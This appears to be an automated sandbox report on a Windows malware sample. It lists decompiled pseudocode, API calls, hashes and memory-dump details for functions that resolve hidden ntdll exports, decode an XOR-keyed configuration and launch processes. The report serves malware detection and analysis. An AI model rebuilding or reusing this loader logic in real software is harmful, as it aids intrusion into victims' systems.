RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00A76142
GetTickCount.KERNEL32 ref: 00A76156
wsprintfA.USER32 ref: 00A761A5
wsprintfA.USER32 ref: 00A761C2
wsprintfA.USER32 ref: 00A761E3
wsprintfA.USER32 ref: 00A76201
wsprintfA.USER32 ref: 00A76216
wsprintfA.USER32 ref: 00A76237
wsprintfA.USER32 ref: 00A76271
wsprintfA.USER32 ref: 00A76291
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A762AC
GetTickCount.KERNEL32 ref: 00A762BC
RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A762D0
RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A762EE

Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B0E
Part of subcall function 00A75AE3: lstrlen.KERNEL32(00000000,?,00000000,00A76301,00000000,05569630), ref: 00A75B16
Part of subcall function 00A75AE3: strcpy.NTDLL ref: 00A75B2D
Part of subcall function 00A75AE3: lstrcat.KERNEL32(00000000,00000000), ref: 00A75B38
Part of subcall function 00A75AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00A76301,?,00000000,00A76301,00000000,05569630), ref: 00A75B55

StrTrimA.SHLWAPI(00000000,00A792CC,00000000,05569630), ref: 00A7631C

Part of subcall function 00A72829: lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
Part of subcall function 00A72829: lstrlen.KERNEL32(?), ref: 00A72841
Part of subcall function 00A72829: lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
Part of subcall function 00A72829: lstrcat.KERNEL32(00000000,?), ref: 00A72860

lstrcpy.KERNEL32(00000000,?), ref: 00A7633A
lstrcat.KERNEL32(00000000,00000000), ref: 00A76348
lstrcat.KERNEL32(00000000,00000000), ref: 00A7634C
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A7637C
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A7638B
HeapFree.KERNEL32(00000000,00000000,00000000,05569630), ref: 00A7639B
HeapFree.KERNEL32(00000000,?), ref: 00A763AC
HeapFree.KERNEL32(00000000,00000000), ref: 00A763BA

Strings

va\x, xrefs: 00A7615E

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: va\x
API String ID: 1837416118-1859480093
Opcode ID: 804db5ac5d5d2b5161c94fcd745e87279956b8ecabf38579693528063c19db43
Instruction ID: 5843a480620e62e14a579ebdb262d65e48656ceca90343cb3e478acee72fc090
Opcode Fuzzy Hash: 804db5ac5d5d2b5161c94fcd745e87279956b8ecabf38579693528063c19db43
Instruction Fuzzy Hash: 22718FB2500604BFD711DBA8EC88E9B77ECEB98310B15C515F94DC7221D636A886CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A7762C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00A7762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xa7a38c; // 0x5569ca8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00A75F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xa791cc;
				}
				_t46 = E00A743FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00A75C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xa7a2d0; // 0x4aed5a8
						_t16 = _t75 + 0xa7bad8; // 0x530025
						 *0xa7a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00A75F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xa791d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00A75C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00A72A03(_v20);
						} else {
							_t66 =  *0xa7a2d0; // 0x4aed5a8
							_t31 = _t66 + 0xa7bbf8; // 0x73006d
							 *0xa7a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00A72A03(_v12);
				}
				return _v24;
			}

0x00a77634
0x00a7763a
0x00a77641
0x00a77647
0x00a7764b
0x00a7764f
0x00a77652
0x00a77659
0x00a7765c
0x00a7765e
0x00a7765e
0x00a77667
0x00a7766e
0x00a77671
0x00a77677
0x00a77681
0x00a7768a
0x00a77691
0x00a776aa
0x00a776b1
0x00a776b4
0x00a776bd
0x00a776c6
0x00a776d7
0x00a776e0
0x00a776e4
0x00a776e8
0x00a776ef
0x00a776f2
0x00a776f4
0x00a776f4
0x00a776fe
0x00a77707
0x00a7770e
0x00a77726
0x00a7772a
0x00a77767
0x00a7772c
0x00a7772f
0x00a77737
0x00a77748
0x00a77754
0x00a7775c
0x00a77760
0x00a77760
0x00a7772a
0x00a7776f
0x00a77774
0x00a7777b

APIs

GetTickCount.KERNEL32 ref: 00A77641
lstrlen.KERNEL32(?,80000002,00000005), ref: 00A77681
lstrlen.KERNEL32(00000000), ref: 00A7768A
lstrlen.KERNEL32(00000000), ref: 00A77691
lstrlenW.KERNEL32(80000002), ref: 00A7769E
lstrlen.KERNEL32(?,00000004), ref: 00A776FE
lstrlen.KERNEL32(?), ref: 00A77707
lstrlen.KERNEL32(?), ref: 00A7770E
lstrlenW.KERNEL32(?), ref: 00A77715

Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 308671d3f8fee26c6f231399e07e3d15695e4e03f3d18f126e66e64ae8aaa345
Instruction ID: e5ed9ff7f3bcdd06486a783d9b56db7e0d4a6030c384878572d2f4714ea11454
Opcode Fuzzy Hash: 308671d3f8fee26c6f231399e07e3d15695e4e03f3d18f126e66e64ae8aaa345
Instruction Fuzzy Hash: C6412472D00219BBCF11AFA4CD09A9EBBB5EF48344F058095E908A7222D7359A65EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A77836, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00A77836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00A771A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00A77973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xa7a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xa7a2d0; // 0x4aed5a8
					_t18 = _t50 + 0xa7b55b; // 0x73797325
					_t52 = E00A71000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xa7a2d0; // 0x4aed5a8
						_t20 = _t53 + 0xa7b73d; // 0x5568ce5
						_t21 = _t53 + 0xa7b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xa7a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00A72A03(_t76);
				goto L12;
			}

0x00a7783f
0x00a7783f
0x00a7784d
0x00a77856
0x00a77859
0x00a7796b
0x00a77972
0x00a77972
0x00a77868
0x00a77870
0x00a77875
0x00a77878
0x00a7788d
0x00a77893
0x00a77894
0x00a77897
0x00a7789d
0x00a778a0
0x00a778a5
0x00a778ad
0x00a778b4
0x00a778bb
0x00a778be
0x00a77952
0x00a778c4
0x00a778c4
0x00a778c9
0x00a778d0
0x00a778e4
0x00a778e8
0x00a77939
0x00a778ea
0x00a778ea
0x00a778f1
0x00a778f8
0x00a77910
0x00a77916
0x00a7791a
0x00a77934
0x00a7791c
0x00a77925
0x00a7792a
0x00a7792a
0x00a7791a
0x00a7794a
0x00a7794a
0x00a778be
0x00a77959
0x00a77962
0x00a77966
0x00000000

APIs

Part of subcall function 00A771A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A77852,?,?,?,?,00000000,00000000), ref: 00A771C8
Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A771EA
Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A77200
Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A77216
Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A7722C
Part of subcall function 00A771A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A77242

memset.NTDLL ref: 00A778A0

Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00A74F1C,73797325), ref: 00A71011
Part of subcall function 00A71000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A7102B

GetModuleHandleA.KERNEL32(4E52454B,05568CE5,73797325), ref: 00A778D7
GetProcAddress.KERNEL32(00000000), ref: 00A778DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A778F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A77916
CloseHandle.KERNEL32(00000000), ref: 00A77925
CloseHandle.KERNEL32(?), ref: 00A7792A
GetLastError.KERNEL32 ref: 00A7792E
HeapFree.KERNEL32(00000000,?), ref: 00A7794A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 228f251496def9085bd71774edc127a5ee3eeb31b33349c1086c1a7e7b3ff3b2
Instruction ID: bf60644f1f4508c433e1e9686974ef93cde0945155f241343ada5926bd4bfb5a
Opcode Fuzzy Hash: 228f251496def9085bd71774edc127a5ee3eeb31b33349c1086c1a7e7b3ff3b2
Instruction Fuzzy Hash: B2312771905219BFDB11EBE4DC48ADEBFB9FF48350F10C066E609A3121D771AA46DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7374B, Relevance: 9.2, APIs: 6, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A7374B(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0xa7a2cc; // 0x63699bc3
				if(E00A73D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0xa7a320 = _v12;
				}
				_t25 =  *0xa7a2cc; // 0x63699bc3
				if(E00A73D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0xa7a2cc; // 0x63699bc3
						_t31 = E00A7257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xa7a298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0xa7a2cc; // 0x63699bc3
						_t32 = E00A7257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xa7a29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0xa7a2cc; // 0x63699bc3
						_t33 = E00A7257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xa7a2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0xa7a2cc; // 0x63699bc3
						_t34 = E00A7257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xa7a004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0xa7a2cc; // 0x63699bc3
						_t35 = E00A7257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xa7a02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0xa7a2cc; // 0x63699bc3
						_t36 = E00A7257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00A75A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E00A7461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0xa7a2cc; // 0x63699bc3
						_t37 = E00A7257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00A75A4E(0, _t37) != 0) {
						_t90 =  *0xa7a37c; // 0x5569630
						E00A76027(_t90 + 4, _t42);
					}
					_t38 =  *0xa7a2d0; // 0x4aed5a8
					_t18 = _t38 + 0xa7b2d2; // 0x556887a
					_t19 = _t38 + 0xa7b7c4; // 0x6976612e
					 *0xa7a31c = _t18;
					 *0xa7a390 = _t19;
					HeapFree( *0xa7a290, 0, _t74);
					L48:
					return 0;
				}
			}

0x00a7374b
0x00a7374e
0x00a7376e
0x00a7377c
0x00a7377c
0x00a73781
0x00a7379b
0x00a7393e
0x00a73940
0x00000000
0x00a737a1
0x00a737a1
0x00a737a8
0x00a737be
0x00a737aa
0x00a737aa
0x00a737b7
0x00a737b7
0x00a737c8
0x00a737ca
0x00a737d4
0x00a737d9
0x00a737d9
0x00a737d4
0x00a737e0
0x00a737f6
0x00a737e2
0x00a737e2
0x00a737ef
0x00a737ef
0x00a737fa
0x00a737fc
0x00a73806
0x00a7380b
0x00a7380b
0x00a73806
0x00a73812
0x00a73828
0x00a73814
0x00a73814
0x00a73821
0x00a73821
0x00a7382c
0x00a7382e
0x00a73838
0x00a7383d
0x00a7383d
0x00a73838
0x00a73844
0x00a7385a
0x00a73846
0x00a73846
0x00a73853
0x00a73853
0x00a7385e
0x00a73860
0x00a7386a
0x00a7386f
0x00a7386f
0x00a7386a
0x00a73876
0x00a7388c
0x00a73878
0x00a73878
0x00a73885
0x00a73885
0x00a73890
0x00a73892
0x00a7389c
0x00a738a1
0x00a738a1
0x00a7389c
0x00a738a8
0x00a738be
0x00a738aa
0x00a738aa
0x00a738b7
0x00a738b7
0x00a738c2
0x00a738c4
0x00a738c7
0x00a738c8
0x00a738cf
0x00a738d1
0x00a738d2
0x00a738d2
0x00a738cf
0x00a738d9
0x00a738ef
0x00a738db
0x00a738db
0x00a738e8
0x00a738e8
0x00a738f3
0x00a73901
0x00a7390b
0x00a7390b
0x00a73910
0x00a73916
0x00a73923
0x00a73929
0x00a7392f
0x00a73934
0x00a73941
0x00a73945
0x00a73945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A737D0
StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73802
StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73834
StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73866
StrToIntExA.SHLWAPI(00000000,00000000,00A72F44,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73898
HeapFree.KERNEL32(00000000,?,?,00A72F44,63699BC3,?,00A72F44,63699BC3,E8FA7DD7,00A7A00C,745EC740,?,?,00A72F44), ref: 00A73934

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 762d69ff403b922cde99da74aaa91bc7595bb0675f7cfdf42e542defefed4295
Instruction ID: 60def94ef830275e8c959530512f0d73552fbb488ff67da4a79669e22723dfd6
Opcode Fuzzy Hash: 762d69ff403b922cde99da74aaa91bc7595bb0675f7cfdf42e542defefed4295
Instruction Fuzzy Hash: EC51D1B2A10104BACF10DBF9DD85CAF77EDAB98700725C925B40DD7225E631DF42AB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A72BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00A72C4F
SysAllocString.OLEAUT32(0070006F), ref: 00A72C63
SysAllocString.OLEAUT32(00000000), ref: 00A72C75
SysFreeString.OLEAUT32(00000000), ref: 00A72CD9
SysFreeString.OLEAUT32(00000000), ref: 00A72CE8
SysFreeString.OLEAUT32(00000000), ref: 00A72CF3

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: d1d34fdc338941d2982ab24f6a28c105f69f29f6357d08f3a95ab151b0ff7029
Instruction ID: 52ea2018efedca95cc53e658dab8d9c24c1f7b3121d1e70abd8e140c83752291
Opcode Fuzzy Hash: d1d34fdc338941d2982ab24f6a28c105f69f29f6357d08f3a95ab151b0ff7029
Instruction Fuzzy Hash: EA314F32D00609AFDB11DFA8CD48ADFB7BAAF49300F148465ED14EB121DB719E46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A771A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A771A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00A75C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xa7a2d0; // 0x4aed5a8
					_t1 = _t23 + 0xa7b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xa7a2d0; // 0x4aed5a8
					_t2 = _t26 + 0xa7b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00A72A03(_t54);
					} else {
						_t30 =  *0xa7a2d0; // 0x4aed5a8
						_t5 = _t30 + 0xa7b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xa7a2d0; // 0x4aed5a8
							_t7 = _t33 + 0xa7b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xa7a2d0; // 0x4aed5a8
								_t9 = _t36 + 0xa7b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xa7a2d0; // 0x4aed5a8
									_t11 = _t39 + 0xa7b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00A7225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00a771b2
0x00a771b6
0x00a77278
0x00a771bc
0x00a771bc
0x00a771c1
0x00a771d4
0x00a771d6
0x00a771db
0x00a771e3
0x00a771ea
0x00a771ee
0x00a771f1
0x00a77270
0x00a77271
0x00a771f3
0x00a771f3
0x00a771f8
0x00a77200
0x00a77204
0x00a77207
0x00000000
0x00a77209
0x00a77209
0x00a7720e
0x00a77216
0x00a7721a
0x00a7721d
0x00000000
0x00a7721f
0x00a7721f
0x00a77224
0x00a7722c
0x00a77230
0x00a77233
0x00000000
0x00a77235
0x00a77235
0x00a7723a
0x00a77242
0x00a77246
0x00a77249
0x00000000
0x00a7724b
0x00a77251
0x00a77256
0x00a7725d
0x00a77264
0x00a77267
0x00000000
0x00a77269
0x00a7726c
0x00a7726c
0x00a77267
0x00a77249
0x00a77233
0x00a7721d
0x00a77207
0x00a771f1
0x00a77286

APIs

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A77852,?,?,?,?,00000000,00000000), ref: 00A771C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A771EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A77200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A77216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A7722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A77242

Part of subcall function 00A7225C: memset.NTDLL ref: 00A722DB

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: b1db082f61493b1f12f72ae7e6aa139fea4c51105947ab892c684cc2d2a54fcb
Instruction ID: 47cf6ce0a2eb05cad79592e4c7171acc5b321ee2aeab5e061460edfc972e9d74
Opcode Fuzzy Hash: b1db082f61493b1f12f72ae7e6aa139fea4c51105947ab892c684cc2d2a54fcb
Instruction Fuzzy Hash: AA21F7B150420AAFDB20DFA9CD44EAA77ECEB54380B01C165F91DC7222E731ED068BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A763CD, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00A763CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00A72BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xa7a2d0; // 0x4aed5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xa7b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xa7b92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xa7a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00a763cd
0x00a763d4
0x00a763d8
0x00a763dd
0x00a763e4
0x00a763e7
0x00a763f1
0x00a763f6
0x00a76402
0x00a76409
0x00a76413
0x00a76413
0x00a7640b
0x00a7640b
0x00a7640b
0x00a7640b
0x00a76419
0x00a7641c
0x00a76424
0x00a76427
0x00a7642a
0x00a7642d
0x00a76432
0x00a7643b
0x00a76448
0x00a7643d
0x00a76443
0x00a76443
0x00a7644e
0x00a7644e
0x00a76456

APIs

